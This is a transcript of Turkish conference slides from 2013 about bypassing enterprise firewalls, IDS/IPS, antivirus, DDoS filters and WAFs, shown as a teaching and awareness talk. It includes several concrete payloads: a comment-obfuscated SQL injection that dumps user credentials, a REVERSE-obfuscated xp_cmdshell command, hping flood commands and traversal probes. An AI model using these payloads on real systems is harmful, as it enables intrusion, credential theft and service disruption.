ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma

SİBER GÜVENLİK YAZ KAMPI/2013E-Crime Turkey - 2012

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma

Huzeyfe ÖNALBilgi Güvenliği AKADEMİSİ[email protected]

SİBER GÜVENLİK YAZ KAMPI/2013EMEA INTELLIGENCE - 2012 / İSTANBUL BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) - bga.com.trE-Crime Turkey - 2012ISTSEC ‘13 Bilgi Güvenliği Konferansı / 2013

Huzeyfe ÖNAL• Kurumsal Güvenlik Hizmetleri Yöneticisi– BGA / Bilgi Güvenliği AKADEMİSİ

• Bilgi Güvenliği Danışmanı• Bilgi Üniversitesi Öğretim Görevlisi• Blogger– www.lifeoverip.net– ...– ...– ...

http://www.lifeoverip.net/


Amaç…• Bilgi güvenliğinin dinamik bir alan olduğu ve tak-

çalıştır hazır sunulan çözümlerin gerçek manada güvenliğimizi arttırmadığının uygulamalı olarak gösterilmesi.

• Bilginin Güvenliğinin para harcamakla doğru orantılı olmadığının gösterimi.

• Bilgi güvenliğini sağlamada en önemli noktanın “yetişmiş insan kaynağı” olduğu fikrine katkıda bulunma.

• Ürün kullanmayın demek değil!


“Kurumsal” Firmalar/İş Ortamları


Tehditlerden Korunma Amaçlı Siber Savunma Sistemleri

• En önemli savunma sistemi konu hakkındaki farkındalıktır.– Eksi farkındalık kavramı...

• Siber savunma sistemleri standart, bilinen saldırılara karşı koruma sağlamak amaçlı geliştirilmiştir.

• Klasik güvenlik anlayışımız: Sihirbazvari her türlü tehditi güvenlik sistemleri/yazılımları “kurarak *” çözmek.


Klasik Güvenlik Anlayışı• Tümden savunma!• Ürün temelli bir güvenlik anlayışı– Ürün= sihirbaz bakış açısı(bilgi-sayar)

• Türkiye’ye özel değil tüm dünya için geçerli• Teknik sorunlar teknik yollarla çözülür, insani

sorunlar insanla çözülür.• Temel bilgi sahibi olmadan ileri seviye işler yapmaya

çalışmak– TCP/IP bilmeden Firewall/IPS yönetmek = İngilizce

bilmeden şarkı söylemeye çalışmak...http://www.youtube.com/watch?v=ccw8dQNAsmc


Kullanılan Siber Savunma Sistem ve Yazılımları

• Firewall (Güvenlik Duvarı)• IDS/IPS (Saldırı Tespit ve Engelleme Sistemi)• WAF (Web Application Firewall)• DoS/DDoS Engelleme Sistemleri• Anti-Virüs/Anti-Spam • DLP (Data Leakage Prevention)• Log ve Monitoring Sistemleri• İnsan


Siber Savunma Sistemlerinin Başarı Oranları• Siber savunma sistemleri klasik, bilinen saldırıları

engellemek için konumlandırılmaktadır.• Reklamı yapıldığı gibi savunma sistemleri gercek bir

“0 day” yakalama başarısını sağlayamaz.• Konumlandırılan ürünler sizin bilginiz ve ürüne

hakimiyetiniz kadar efektif çözüm sunar.• Tüm siber savunma sistemleri internetten

ogrenilebilecek yöntem ve araçlarla atlatılabilmektedir.


Güvenlik Duvarı / Firewall• En temel amacı ağlar arası

yalıtımdır.• İç ağdan internete/DMZ’e

doğru yapılan erişimler ve internetten DMZ/yerel ağa erişimlerde kontrol sağlamak amaçlı kullanılır.

• Port, IP bazlı erişim kontrol listesi yazılabilir.

• Yeni nesil Firewall sistemleri içerik kontrolü, port kontrolü de yapabilir.


Firewall Çalışma Mantığı• Ağlar arası erişim kontrolü amacıyla kullanılır• Port ve IP Bazlı çalışır– 192.168.1.2 ANY TCP Port 80– 192.168.9.0/24 ANY UDP 53

• İçeriği denetleyemez(?)• Bazı Firewalllar L7(içeriği göre de engelleme

yapabilir)• Bazı Firewalllar MAC adresine göre filtreleme

yapabilir• Hesap bilgilerine göre filtreleme özelliği –Active

Directory, LDAP


Güvenlik Duvarları Nasıl Engelleme Yapar?• Güvenlik Duvarları genelde iki tip engelleme

yöntemi kullanır– DROP– REJECT

• DROP: Gelen/giden paketi engelle ve geriye herhangi bir mesaj dönme

• REJECT:Gelen/giden paketi engelle ve geriye TCP RST/UDP Port Ulaşılamaz gibi bir mesaj dön


Firewall Atlatma(İç Ağdan Internete)• Genellikle kurumsal ağlarda istemci sistemler

internete doğrudan erişim hakkına sahip değildir.• HTTP ve HTTPS istekleri Proxy, içerik filtreleme

sistemleri üzerinden işlenir.• HTTP ve HTTPS üzerinden tünelleme yapılarak

güvenlik duvarları atlatılabilir.– Httptunnel, Webtunnel uygulaması

• DNS Tünelleme kullanılarak doğrudan internetteki bir sisteme VPN yapılabilir.

• Webtunnel kullanarak HTTP istekleri ile sınırsız erişim yapılabilir.


WebTunnel

Normal HTTP istekleri kullanarak TCP protokollerini tünelleme. %100 HTTP uyumlu olduğu için Yeni nesil güvenlik duvarları dahil engelleme yapamamaktadır.


DNS Tünelleme• Amaç sadece yerel ağ dns sunucusuna erişimi olan

iç ağ kullanıcısının bu DNS sunucuyu aracı olarak kullanarak internete paket gönderip alabilmesi.

• Özellikle kapalı networklerden dışarı çıkış için tek yolun DNS olduğu durumlarda vazgeçilmez tünelleme yöntemidir.

• Günümüzde çoğu ağ – özellikle ticari Wifi sistemler- bu yönteme karşı korumasızdır.


DNS Tünelleme ile Firewall Atlatma


Firewall Atlatma (Reverse Shell)• Internetten DMZ bölgesine yönelik sadece

HTTP/HTTPS ve SMTP portu açık olmaktadır.• Sunuculara doğrudan erişim yoktur, NAT vb

yöntemlerle erişim yapılır.• DMZ bölgesindeki sistemlere yönelik incoming trafik

genellikle FW üzerinden ayarlansa da outgoing trafik serbest bırakılmaktadır (%100)

• Tersine tünel açma yöntemi ile DMZ’de normalde yapılamayan RDP vs gibi erişimler yapılabilir.


Firewall Atlatma:Ters Tünelleme

• Teamviewer mantığı!


Saldırı Tespit ve Engelleme Sistemleri


IDS/IPS Çalışma Mantığı• PORT, IP ve içeriğe göre karar verir• Firewall dan en önemli farkı paketlerdeki veri

alanlarını(Payload) inceleyebilmesi• Örnek:– Firewall: DST TCP Port 80 ACCEPT– IPS: dst tcp port 80 and http_uri = cmd.exe DROP


Saldırı Engelleme Sistemleri(IPS)• İkinci nesil güvenlik sistemleri– Firewall & IDS -> IPS & WAF

• Pakete ait tüm alanları(L2-L7 arası) iceleyip karar verebilir• DROP TCP ANY 80 URICONTENT cmd.exe• Drop tcp any any -> 192.168.1.0/24 80 (content: "cgi-

bin/phf"; offset: 3; depth: 22; msg: "CGI-PHF attack";)• Temelde iki farklı amaç için tercih edilir– İçerden dışarı yapılabilecek saldırılarda/istenmeyen

trafiklerde– Dışardan gelebilecek saldırılarda


IPS Keşif Çalışması• Amaç:hedef sistem önünde aktif olarak çalışan

IPS’lerin belirlenmesi• Çoğu IPS ../../etc/passwd ve ../../../cmd.exe

isteklerine karşı engelleme politikasına sahiptir.• Hedef sunucuya bu tip HTTP istekleri göndererek

sistem önünde IPS var mı yok mu anlaşılabilir• http://blog.lifeoverip.net/2010/02/15/penetrasyon-

testlerinde-ips-kesfi/

http://blog.lifeoverip.net/2010/02/15/penetrasyon-testlerinde-ips-kesfi/

http://blog.lifeoverip.net/2010/02/15/penetrasyon-testlerinde-ips-kesfi/


IPS Şaşırtma• Tor Ağı üzerinden port tarama, paket gönderme• Nmap decoy scanning– Port taramayı farklı IP adreslerinden geliyormuş gibi

gösterme


SSL Üzerinden IPS Atlatma• Örnek uygulama


Encoding Yöntemi ile IPS Atlatma


Parçalanmış Paketlerle IDS atlatma• echo "0" > /proc/sys/net/ipv4/conf/all/rp_filter

tcp_seg 10ip_frag 64tcp_chaff pawsorder randomprint


Antivirüs/HIPS Atlatma• AV yazılımları çalıştırılabilir veya normal dosyaların

davranışı, imzaları ve içeriklerine göre sınıflandırarak engelleme yapar.

• En temel engelleme yöntemi statik olarak içerik ve hash kontrolüdür.

• Davranışsal tabanlı engelleme yöntem ve araçları hassasiyet seviyesine göre rahatlıkla atlatılabilmektedir.

• Ne kadar az hassasiyet o kadar kolay atlatma, ne kadar çok hassasiyet o kadar müşteri memnuniyetsizliği!


AV Atlatma Örneğihttp://xploitaday.komodin.org/tools/php-encoder/index.html


HIPS Atlatma Denemesi


DDoS Engelleme Sistemleri• DOS/DDoS Saldırılarını Engelleme Amaçlı

Geliştirilmiştir• Genellikle istatistiksel veri analizine dayanır• Karantina/Rate limiting/Threshold özelliği elzemdir!• Dikkatli ayarlanmamış bir DDoS engelleme sistemi

tersine bir amaç için kullanılır– ...


DDoS Sistemi Keşif ÇAlışması• %100 garantili keşif yöntemi değildir• Amaç rate limiting özelliğinin varlığını anlama• Hping –S –p 80 –flood 1.2.3.4• Hping –udp –p 53 –flood 1.2.3.4• İlgili portlara erişim sağlanamıyorsa muhtemelen bir

ddos engelleme sistemi sizi karantinaya almıştır.


Örnek Iptables Kuralları• iptables -A INPUT –p tcp –dport 80 -m limit --limit

50/s --limit-burst 30 –j REJECT • 10 dakikada max 10 bağlantı#iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport

513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT

#iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP


Hping ile Özel Paket Üretimi• Mikrosaniye =saniyenin 100.000’de biri• Saniyede 10 paket göndermek için– #hping -i u10000 -S -p 22 www.hedefsite.com –a

istenilen_ip_adresi• Saniyede 100 adet paket gönderimi– #hping -S -p 22 192.168.2.23 -c 1000 -i u100

http://www.hedefsite.com/




Web Uygulama Güvenlik Duvarı• Web uygulamalarına spesifik güvenlik duvarı• Sadece port/ip değil tüm paket içeriğine(HTTP,

HTTPS vs) bakarak işlem yapılır• WAF arkasında çalıştırılan uygulama sisteme ne

kadar iyi tanıtılırsa o oranda başarı sağlanır • Ağ tabanlı IPS’lerden daha fazla koruma sağlar!• Değişik yerleşim/çalışma modelleri vardır– Inline– Reverse Proxy– Passive(Active Response)


WAF Keşif Çalışması• Wafw00f• Xss denemeleri vs


WAF Atlatma• Genellikle WAF’lar SSL çözümleme yaptığı için SSL

üzerinden atlatma işe yaramaz• WAF’ların çıkışından itibaren çeşitli atlatma

teknikleri geliştirilmiştir• /*!12345 select * from */• Reverse_exec• http splitting


WAF Atlatma:SQL Yorumları• /* comment */ yorum satırı olarak algılanır(SQL

+WAF+IPS tarafından)• /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak

algılanmaz(SQL tarafından)(WAF+IPS’ler tarafından yorum olarak algılanır)

• /?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/


WAF Atlatma:Encoding

Inline çalışan WAF/IPS’lerde işe yarar


WAF Atlatma:Reverse Fonksiyonu• SQL Sunucularda bulunan reverse fonksiyonu kullanılır– Reverse(lqs) = sql

• var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('“08.911.39.19 gnip" llehsdmc_px') EXEC (@c);--

• REVERSE('“08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80


En Zayıf Halka


Sürü Psikolojisi

46

1

2

3

4


İletişim Bilgileri

• www.lifeoverip.net• Blog.bga.com.trBlog

• @bgakademisi• @huzeyfeonalTwitter

• [email protected]• [email protected]İletişim

ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma

Documents

Transcript of ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma